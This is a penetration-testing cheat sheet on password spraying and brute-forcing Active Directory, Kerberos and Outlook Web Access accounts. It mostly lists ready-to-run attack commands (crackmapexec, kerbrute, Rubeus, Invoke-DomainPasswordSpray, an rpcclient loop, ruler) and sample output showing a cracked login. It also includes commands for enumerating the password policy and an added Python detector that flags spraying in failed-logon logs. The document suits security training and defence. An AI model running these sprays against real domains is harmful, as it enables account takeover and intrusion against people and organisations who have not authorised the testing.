Password Spraying / Brute Force


Password Spraying

Once you have found several valid usernames you can try the most common passwords (keep the password policy of the environment in mind) against each of the discovered users. By default the minimum password length is 7.

Lists of common usernames can also be useful: https://github.com/insidetrust/statistically-likely-usernames

Note that you could lock out some accounts if you try several wrong passwords (by default more than 10).
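Because a spray deliberately stays below the lockout threshold, the lockout policy alone never fires on it; the detectable signal is one source failing once against many accounts, while a brute force is one account failing many times. The following script is an added example (not part of the original page or any tool named here) that classifies constructed failed-logon records, in an assumed simplified one-line form of a Windows 4625 event, into spray, brute force or benign per source IP:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed one-line form of a Windows 4625 (failed logon) record for this example.
LINE_RE = re.compile(r"^(\S+) 4625 user=(\S+) src=(\S+)$")
# Constructed sample: 10.10.10.50 sprays one password over five accounts,
# 10.10.10.77 brute-forces one account twelve times, 10.10.10.90 is one typo.
SAMPLE_LOG = """\
2024-05-01T09:00:01 4625 user=larsson src=10.10.10.50
2024-05-01T09:00:02 4625 user=cube0x0 src=10.10.10.50
2024-05-01T09:00:03 4625 user=a.admin src=10.10.10.50
2024-05-01T09:00:04 4625 user=c.cube src=10.10.10.50
2024-05-01T09:00:05 4625 user=s.svensson src=10.10.10.50
2024-05-01T09:02:00 4625 user=jdoe src=10.10.10.90
""" + "".join(f"2024-05-01T09:01:{s:02d} 4625 user=thoffman src=10.10.10.77\n"
              for s in range(12))

def parse(log):
    """Yield (timestamp, user, source_ip) for every well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)

def classify_sources(log, window=timedelta(minutes=30), min_users=5,
                     lockout_threshold=10):
    """Return {src: (label, distinct_users, max_failures_per_user)} where label is
    "spray" (>= min_users accounts, each below the lockout threshold, so lockout
    never fires), "brute" (one account hit >= lockout_threshold times) or None."""
    by_src = defaultdict(list)
    for ts, user, src in parse(log):
        by_src[src].append((ts, user))
    verdicts = {}
    for src, events in by_src.items():
        events.sort()
        first = events[0][0]          # only count failures inside one window
        per_user = defaultdict(int)
        for ts, user in events:
            if ts - first <= window:
                per_user[user] += 1
        users, worst = len(per_user), max(per_user.values())
        if worst >= lockout_threshold:
            label = "brute"
        elif users >= min_users:
            label = "spray"
        else:
            label = None
        verdicts[src] = (label, users, worst)
    return verdicts
```

Feed it real 4625 (or Kerberos 4771 pre-authentication failure) records after adapting LINE_RE, and tune min_users and lockout_threshold to the domain's actual policy.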

Get the password policy

If you have some user credentials or a shell as a domain user you can get the password policy with:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Exploitation from Linux (or all)

  • Using crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
  • spray (you can indicate the number of attempts to avoid lockouts):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
  • Using kerbrute (python) - NOT RECOMMENDED, SOMETIMES IT DOESN'T WORK

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
  • With the scanner/smb/smb_login module of Metasploit:

  • Using rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

From Windows

  • With the Rubeus version that has the brute module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
  • With Invoke-DomainPasswordSpray (it can generate the user list from the domain by default, and it will get the password policy from the domain and limit the attempts according to it):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Outlook Web Access

There are multiple tools for password spraying Outlook.

To use any of these tools, you need a list of users and a password / a small list of passwords to spray.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

Okta

References
